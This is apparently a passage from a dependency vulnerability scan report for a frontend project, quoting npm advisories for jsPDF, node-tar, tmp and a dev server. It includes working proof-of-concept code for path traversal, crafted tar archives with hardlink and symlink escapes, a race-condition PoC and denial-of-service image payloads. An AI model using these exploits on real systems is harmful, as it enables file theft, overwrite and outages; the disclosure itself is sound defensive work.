The scenario above fetches the compiled content, but if the victim has the source map option enabled, the attacker can also get the non-compiled content by fetching the source map file.
### PoC
1. Download [reproduction.zip](https://github.com/user-attachments/files/18561484/reproduction.zip)
2. Extract it and move to that directory
1. Run `npm i`
1. Run `npm run watch`
1. Run `fetch('http://127.0.0.1:8000/app.js').then(r => r.text()).then(content => console.log(content))` in a different website's dev tools.

### Impact
Users using the serve feature may get the source code stolen by malicious websites.

CWE-346 Origin Validation Error

Vulnerable Software & Versions (NPM):
File Path: /builds/pub/numeco/misis/misis-frontend/package-lock.json?jspdf
Referenced In Project/Scope: package-lock.json: transitive
### Impact
User control of the first argument of the loadFile method in the node.js build allows local file inclusion/path traversal.
If given the possibility to pass unsanitized paths to the loadFile method, a user can retrieve file contents of arbitrary files in the local file system the node process is running in. The file contents are included verbatim in the generated PDFs.
Other affected methods are: `addImage`, `html`, `addFont`.
Only the node.js builds of the library are affected, namely the `dist/jspdf.node.js` and `dist/jspdf.node.min.js` files.
Example attack vector:
```js
import { jsPDF } from "./dist/jspdf.node.js";
const doc = new jsPDF();
doc.addImage("./secret.txt", "JPEG", 0, 0, 10, 10);
doc.save("test.pdf"); // the generated PDF will contain the "secret.txt" file
```
### Patches
The vulnerability has been fixed in jsPDF@4.0.0. This version restricts file system access per default. This semver-major update does not introduce other breaking changes.
### Workarounds
With recent node versions, jsPDF recommends using the `--permission` flag in production. The feature was introduced experimentally in v20.0.0 and is stable since v22.13.0/v23.5.0/v24.0.0. See the [node documentation](https://nodejs.org/api/permissions.html) for details.
For older node versions, sanitize user-provided paths before passing them to jsPDF.
### Credits
Researcher: kilkat (Kwangwoon Kim)

CWE-35 Path Traversal: '.../...//', CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-73 External Control of File Name or Path

Vulnerable Software & Versions (NPM):
### Impact
User control of the first argument of the addImage method results in CPU utilization and denial of service.
If given the possibility to pass unsanitized image data or URLs to the addImage method, a user can provide a harmful PNG file that results in high CPU utilization and denial of service.
Other affected methods are: `html`.
Example payload:
```js
import { jsPDF } from "jspdf"
const payload = new Uint8Array([117, 171, 90, 253, 166, 154, 105, 166, 154])
const doc = new jsPDF();
const startTime = performance.now();
try {
doc.addImage(payload, "PNG", 10, 40, 180, 180, undefined, "SLOW");
} finally {
const endTime = performance.now();
console.log(`Call to doc.addImage took ${endTime - startTime} milliseconds`);
}
```
### Patches
The vulnerability was fixed in jsPDF 3.0.2. Upgrade to jspdf@>=3.0.2.
In jspdf@>=3.0.2, invalid PNG files throw an Error instead of causing very long-running loops.
### Workarounds
Sanitize image data or URLs before passing them to the addImage method or one of the other affected methods.
### Credits
Researcher: Aleksey Solovev (Positive Technologies)
CWE-20 Improper Input Validation, CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
Vulnerable Software & Versions (NPM):
### Impact
User control of the first argument of the `addImage` method results in CPU utilization and denial of service.
If given the possibility to pass unsanitized image urls to the `addImage` method, a user can provide a harmful data-url that results in high CPU utilization and denial of service.
Other affected methods are: `html`, `addSvgAsImage`.
Example payload:
```js
import { jsPDF } from "jspdf"
const doc = new jsPDF();
const payload = 'data:/charset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=s\x00base64,undefined';
const startTime = performance.now()
try {
doc.addImage(payload, "PNG", 10, 40, 180, 180, undefined, "SLOW");
} catch (err) {
const endTime = performance.now()
console.log(`Call to doc.addImage took ${endTime - startTime} milliseconds`)
}
doc.save("a4.pdf");
```
### Patches
The vulnerability was fixed in jsPDF 3.0.1. Upgrade to jspdf@>=3.0.1.
### Workarounds
Sanitize image URLs before passing them to the `addImage` method or one of the other affected methods.
### Credits
Researcher: Aleksey Solovev (Positive Technologies)
CWE-400 Uncontrolled Resource Consumption, CWE-770 Allocation of Resources Without Limits or Throttling
Vulnerable Software & Versions (NPM):
File Path: /builds/pub/numeco/misis/misis-frontend/karma.conf.js
MD5: 0252269cf0d9f0811a1c470e800e2126
SHA1: a8499b99e58cb892900ba688441310f193138f11
SHA256:f02aa533841dbb98cbe4b7803b454f40a6ec1cbc22688b6468b511f98470e1a7
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/main-UIRZGBEJ.js
MD5: a1bb06aceafbb69cfe417f6d1c3412ae
SHA1: 8733e04a12066f0c83804aaa50ec805c52ef5ed1
SHA256:385f756e91ba760f2717244e31ee06371c35938ac11fa6899042c475a2c7648d
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/polyfills-FFHMD2TL.js
MD5: feb8fabaa54a01a42a5d3785369cea71
SHA1: f49b49a155bc7d192db62a4c15d0a612b460a667
SHA256:69dcea045643dd0de998a3cd0ccbbb46b46bff2651a87a56c73c28eb208e8f98
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/scripts-NF74VGQ5.js
MD5: 2abe734603979ee975e8274b59119ca2
SHA1: 7fb1a0e5a114d6185aa3326fccf5aad9b33825b3
SHA256:a9814773b8160ee75537eda6c65bd42701f083ead42d512e87bf0a2855031330
File Path: /builds/pub/numeco/misis/misis-frontend/src/assets/static-config.js
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
File Path: /builds/pub/numeco/misis/misis-frontend/src/environments/dev/static-config.js
MD5: 62b7e80d9134a8ee5788ac652ac9f8d7
SHA1: 54fcf9c96e56ebbb55a4deabddc151e56ff6ceeb
SHA256:3e48f28be9b18eb4ad11c24fe3530f2723ef0277b80000bc2c62ad91011474ec
File Path: /builds/pub/numeco/misis/misis-frontend/src/environments/prod/static-config.js
MD5: ddbf4a72b50a5e5caacfc3f7cd13cddc
SHA1: 7c09b64f05b54c626c77e65fce405acb0299bdf5
SHA256:4c19ade5d5a370479f980d8fec6dd892b9fa29d3912a04fb67b972b3f3dcf980
File Path: /builds/pub/numeco/misis/misis-frontend/package-lock.json?tar
Referenced In Project/Scope: package-lock.json: transitive
**TITLE**: Race Condition in node-tar Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS
**AUTHOR**: Tomás Illuminati
### Details
A race condition vulnerability exists in `node-tar` (v7.5.3) due to incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, on which this was tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized, which prevents race conditions where one entry might clobber another concurrently.
```typescript
// node-tar/src/path-reservations.ts (Lines 53-62)
reserve(paths: string[], fn: Handler) {
paths =
isWindows ?
['win32 parallelization disabled']
: paths.map(p => {
return stripTrailingSlashes(
join(normalizeUnicode(p)), // <- THE PROBLEM FOR MacOS FS
).toLowerCase()
})
```
On macOS the filesystem treats `ß` and `ss` as the same name, but `join(normalizeUnicode(p))` does not. For example:
```bash
bash-3.2$ printf "CONTENT_SS\n" > collision_test_ss
bash-3.2$ ls
collision_test_ss
bash-3.2$ printf "CONTENT_ESSZETT\n" > collision_test_ß
bash-3.2$ ls -la
total 8
drwxr-xr-x 3 testuser staff 96 Jan 19 01:25 .
drwxr-x---+ 82 testuser staff 2624 Jan 19 01:25 ..
-rw-r--r-- 1 testuser staff 16 Jan 19 01:26 collision_test_ss
bash-3.2$
```
---
### PoC
```javascript
const tar = require('tar');
const fs = require('fs');
const path = require('path');
const { PassThrough } = require('stream');
const exploitDir = path.resolve('race_exploit_dir');
if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
fs.mkdirSync(exploitDir);
console.log('[*] Testing...');
console.log(`[*] Extraction target: ${exploitDir}`);
// Construct stream
const stream = new PassThrough();
const contentA = 'A'.repeat(1000);
const contentB = 'B'.repeat(1000);
// Entry 1: path "collision_ss"
const header1 = new tar.Header({
path: 'collision_ss',
mode: 0o644,
size: contentA.length,
});
header1.encode();
// Entry 2: path "collision_ß" (collides with entry 1 on APFS)
const header2 = new tar.Header({
path: 'collision_ß',
mode: 0o644,
size: contentB.length,
});
header2.encode();
// Write to stream
stream.write(header1.block);
stream.write(contentA);
stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding
stream.write(header2.block);
stream.write(contentB);
stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding
// End
stream.write(Buffer.alloc(1024));
stream.end();
// Extract
const extract = new tar.Unpack({
cwd: exploitDir,
// Ensure jobs is high enough to allow parallel processing if locks fail
jobs: 8
});
stream.pipe(extract);
extract.on('end', () => {
console.log('[*] Extraction complete');
// Check what exists
const files = fs.readdirSync(exploitDir);
console.log('[*] Files in exploit dir:', files);
files.forEach(f => {
const p = path.join(exploitDir, f);
const stat = fs.statSync(p);
const content = fs.readFileSync(p, 'utf8');
console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
});
if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {
console.log('[*] GOOD');
} else {
console.log('[-] No collision');
}
});
```
---
### Impact
This is a **Race Condition** which enables **Arbitrary File Overwrite**. This vulnerability affects users and systems using **node-tar on macOS (APFS/HFS+)**. Because the library uses `NFD` Unicode normalization (under which `ß` and `ss` are distinct), conflicting paths do not have their processing order preserved on filesystems that ignore Unicode normalization (e.g., APFS, on which `ß` collides with `ss` on the same inode). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive.
---
### Remediation
Update `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`.
Users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.
---
CWE-176 Improper Handling of Unicode Encoding
Vulnerable Software & Versions (NPM):
### Summary
The `node-tar` library (`<= 7.5.2`) fails to sanitize the `linkpath` of `Link` (hardlink) and `SymbolicLink` entries when `preservePaths` is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to **Arbitrary File Overwrite** via hardlinks and **Symlink Poisoning** via absolute symlink targets.
### Details
The vulnerability exists in `src/unpack.ts` within the `[HARDLINK]` and `[SYMLINK]` methods.
**1. Hardlink Escape (Arbitrary File Overwrite)**
The extraction logic uses `path.resolve(this.cwd, entry.linkpath)` to determine the hardlink target. Standard Node.js behavior dictates that if the second argument (`entry.linkpath`) is an **absolute path**, `path.resolve` ignores the first argument (`this.cwd`) entirely and returns the absolute path.
The library fails to validate that this resolved target remains within the extraction root. A malicious archive can create a hardlink to a sensitive file on the host (e.g., `/etc/passwd`) and subsequently write to it, if file permissions allow writing to the target file, bypassing path-based security measures that may be in place.
**2. Symlink Poisoning**
The extraction logic passes the user-supplied `entry.linkpath` directly to `fs.symlink` without validation. This allows the creation of symbolic links pointing to sensitive absolute system paths or traversing paths (`../../`), even when secure extraction defaults are used.
### PoC
The following script generates a binary TAR archive containing malicious headers (a hardlink to a local file and a symlink to `/etc/passwd`). It then extracts the archive using standard `node-tar` settings and demonstrates the vulnerability by verifying that the local "secret" file was successfully overwritten.
```javascript
const fs = require('fs')
const path = require('path')
const tar = require('tar')
const out = path.resolve('out_repro')
const secret = path.resolve('secret.txt')
const tarFile = path.resolve('exploit.tar')
const targetSym = '/etc/passwd'
// Cleanup & Setup
try { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}
fs.mkdirSync(out)
fs.writeFileSync(secret, 'ORIGINAL_DATA')
// 1. Craft malicious Link header (Hardlink to absolute local file)
const h1 = new tar.Header({
path: 'exploit_hard',
type: 'Link',
size: 0,
linkpath: secret
})
h1.encode()
// 2. Craft malicious Symlink header (Symlink to /etc/passwd)
const h2 = new tar.Header({
path: 'exploit_sym',
type: 'SymbolicLink',
size: 0,
linkpath: targetSym
})
h2.encode()
// Write binary tar
fs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))
console.log('[*] Extracting malicious tarball...')
// 3. Extract with default secure settings
tar.x({
cwd: out,
file: tarFile,
preservePaths: false
}).then(() => {
console.log('[*] Verifying payload...')
// Test Hardlink Overwrite
try {
fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')
if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {
console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')
} else {
console.log('[-] Hardlink failed')
}
} catch (e) {}
// Test Symlink Poisoning
try {
if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {
console.log('[+] VULN CONFIRMED: Symlink points to absolute path')
} else {
console.log('[-] Symlink failed')
}
} catch (e) {}
})
```
### Impact
* **Arbitrary File Overwrite:** An attacker can overwrite any file the extraction process has access to, bypassing path-based security restrictions. It does not grant write access to files that the extraction process does not otherwise have access to, such as root-owned configuration files.
* **Remote Code Execution (RCE):** In CI/CD environments or automated pipelines, overwriting configuration files, scripts, or binaries leads to code execution. (However, npm is unaffected, as it filters out all `Link` and `SymbolicLink` tar entries from extracted packages.)
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Vulnerable Software & Versions (NPM):
File Path: /builds/pub/numeco/misis/misis-frontend/package-lock.json?tmp
Referenced In Project/Scope: package-lock.json: transitive
### Summary
`tmp@0.2.3` is vulnerable to an arbitrary temporary file / directory write via a symbolic link in the `dir` parameter.
### Details
According to the documentation, there are some conditions that must hold:
```
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
```
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because `_resolvePath` does not properly handle symbolic links when resolving paths:
```js
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
if (name.startsWith(tmpDir)) {
return path.resolve(name);
} else {
return path.resolve(path.join(tmpDir, name));
}
}
```
If the `dir` parameter points to a symlink that resolves to a folder outside the `tmpDir`, it's possible to bypass the `_assertIsRelative` check used in `_assertAndSanitizeOptions`:
```js
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
if (option === 'name') {
// assert that name is not absolute and does not contain a path
if (path.isAbsolute(name))
throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
// must not fail on valid .<name> or ..<name> or similar such constructs
let basename = path.basename(name);
if (basename === '..' || basename === '.' || basename !== name)
throw new Error(`${option} option must not contain a path, found "${name}".`);
}
else { // if (option === 'dir' || option === 'template') {
// assert that dir or template are relative to tmpDir
if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
}
let resolvedPath = _resolvePath(name, tmpDir); //<---
if (!resolvedPath.startsWith(tmpDir))
throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
}
}
```
### PoC
The following PoC demonstrates how writing a tmp file to a folder outside the `tmpDir` is possible.
Tested on a Linux machine.
- Setup: create a symbolic link inside the `tmpDir` that points to a directory outside of it
```bash
mkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
```
- Check that the folder is empty:
```bash
ls -lha $HOME/mydir1 | grep "tmp-"
```
- Run the PoC:
```bash
node main.js
File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
```
- The temporary file is created under `$HOME/mydir1` (outside the `tmpDir`):
```bash
ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]
```
- `main.js`
```js
// npm i tmp@0.2.3
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
```
A potential fix could be to call `fs.realpathSync` (or similar), which also resolves symbolic links:
```js
function _resolvePath(name, tmpDir) {
let resolvedPath;
if (name.startsWith(tmpDir)) {
resolvedPath = path.resolve(name);
} else {
resolvedPath = path.resolve(path.join(tmpDir, name));
}
return fs.realpathSync(resolvedPath);
}
```
### Impact
Arbitrary temporary file / directory write via symlink
CWE-59 Improper Link Resolution Before File Access ('Link Following')
Vulnerable Software & Versions (NPM):